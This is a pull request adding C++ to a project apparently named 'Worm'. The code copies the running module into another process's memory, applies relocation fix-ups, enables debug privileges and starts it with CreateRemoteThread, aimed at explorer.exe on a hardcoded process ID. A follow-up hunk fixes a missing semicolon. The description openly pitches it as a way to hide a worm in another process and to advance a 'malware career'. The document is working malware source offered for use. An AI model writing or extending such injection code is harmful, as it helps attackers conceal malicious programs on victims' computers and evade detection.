### PR TITLE
CreateRemoteThread Worm Injection into EXPLORER.EXE

### DIFF
--- a/Worm/w0rm.cpp
+++ b/Worm/w0rm.cpp
@@ -636,3 +636,152 @@ void releasePayload()
         return;
 }
 //----------------------------------------------------------------------------//
+
+void testInject()
+{	
+	pid = 5239; // Replace with PID of EXPLORER.EXE
+	BeginInject(pid, main)
+}
+
+DWORD GetProcessIdByName(WCHAR *name)
+{
+	PROCESSENTRY32 pe32;
+	HANDLE snapshot = NULL;
+
+	snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
+	if (snapshot != INVALID_HANDLE_VALUE) {
+		pe32.dwSize = sizeof(PROCESSENTRY32);
+
+		if (Process32First(snapshot, &pe32)) {
+			do {
+				if (!lstrcmp(pe32.szExeFile, name))
+					return pe32.th32ProcessID;
+
+			} while (Process32Next(snapshot, &pe32));
+		}
+
+		CloseHandle(snapshot);
+	}
+
+	return 0;
+}
+
+LPVOID CopyModule(HANDLE proc, LPVOID image)
+{
+	PIMAGE_NT_HEADERS headers = (PIMAGE_NT_HEADERS)((LPBYTE)image + ((PIMAGE_DOS_HEADER)image)->e_lfanew);
+	PIMAGE_DATA_DIRECTORY datadir;
+	DWORD size = headers->OptionalHeader.SizeOfImage;
+	LPVOID mem;
+	LPBYTE buf;
+	BOOL ok = FALSE;
+
+	if (headers->Signature != IMAGE_NT_SIGNATURE)
+		return NULL;
+
+	if (IsBadReadPtr(image, size))
+		return NULL;
+	
+	mem = VirtualAllocEx(proc, NULL, size, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+	
+	if (mem != NULL) {
+		buf = (LPBYTE)VirtualAlloc(NULL, size, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+
+		if (buf != NULL) {
+			bmemcpy(buf, image, size);
+
+			datadir = &headers->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC];
+
+			if (datadir->Size > 0 && datadir->VirtualAddress > 0) {
+				DWORD_PTR delta = (DWORD_PTR)((LPBYTE)mem - headers->OptionalHeader.ImageBase);
+				DWORD_PTR olddelta = (DWORD_PTR)((LPBYTE)image - headers->OptionalHeader.ImageBase);
+				PIMAGE_BASE_RELOCATION reloc = (PIMAGE_BASE_RELOCATION)(buf + datadir->VirtualAddress);
+
+				while(reloc->VirtualAddress != 0) {
+					if (reloc->SizeOfBlock >= sizeof(IMAGE_BASE_RELOCATION)) {
+						DWORD count = (reloc->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) / sizeof(WORD);
+						LPWORD list = (LPWORD)((LPBYTE)reloc + sizeof(IMAGE_BASE_RELOCATION));
+						DWORD i;
+
+						for (i = 0; i < count; i++) {
+							if (list[i] > 0) {
+								DWORD_PTR *p = (DWORD_PTR *)(buf + (reloc->VirtualAddress + (0x0FFF & (list[i]))));
+
+								*p -= olddelta;
+								*p += delta;
+							}
+						}
+					}
+
+					reloc = (PIMAGE_BASE_RELOCATION)((LPBYTE)reloc + reloc->SizeOfBlock);
+				}
+
+				ok = WriteProcessMemory(proc, mem, buf, size, NULL);
+			}
+
+			VirtualFree(buf, 0, MEM_RELEASE); // release buf
+		}
+		
+		if (!ok) {
+			VirtualFreeEx(proc, mem, 0, MEM_RELEASE);
+			mem = NULL;
+		}
+	}
+
+	return mem;
+}
+
+BOOL EnableDebugPrivileges(void)
+{
+	HANDLE token;
+	TOKEN_PRIVILEGES priv;
+	BOOL ret = FALSE;
+
+	if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &token)) {
+		priv.PrivilegeCount = 1;
+		priv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
+
+		if (LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &priv.Privileges[0].Luid) != FALSE &&
+			AdjustTokenPrivileges(token, FALSE, &priv, 0, NULL, NULL) != FALSE) {
+				ret = TRUE;
+		}
+
+		CloseHandle(token);
+	}
+
+	return ret;
+}
+
+BOOL BeginInject(DWORD pid, LPTHREAD_START_ROUTINE start)
+{
+	HANDLE proc, thread;
+	HMODULE module, newmodule;
+	BOOL ok = FALSE;
+
+	proc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
+
+	if (proc != NULL) {
+		module = GetModuleHandle(NULL);
+
+		newmodule = (HMODULE)CopyModule(proc, module);
+
+		if (newmodule != NULL) {
+			
+			LPTHREAD_START_ROUTINE entry = (LPTHREAD_START_ROUTINE)((LPBYTE)newmodule + (DWORD_PTR)((LPBYTE)start - (LPBYTE)module));
+
+			thread = CreateRemoteThread(proc, NULL, 0, entry, NULL, 0, NULL);
+
+			if (thread != NULL) {
+				CloseHandle(thread);
+
+				ok = TRUE;
+			}
+			else {
+				VirtualFreeEx(proc, module, 0, MEM_RELEASE);
+			}
+		}
+
+		CloseHandle(proc);
+	}
+
+	return ok;
+}

--- a/Worm/w0rm.cpp
+++ b/Worm/w0rm.cpp
@@ -640,7 +640,7 @@ void releasePayload()
 void testInject()
 {	
 	pid = 5239; // Replace with PID of EXPLORER.EXE
-	BeginInject(pid, main)
+	BeginInject(pid, main);
 }
 
 DWORD GetProcessIdByName(WCHAR *name)


### PR DESCRIPTION
Injects the worm into EXPLORER.EXE or any other process you want to hide in. The first step in bringing your malware career to the next level.
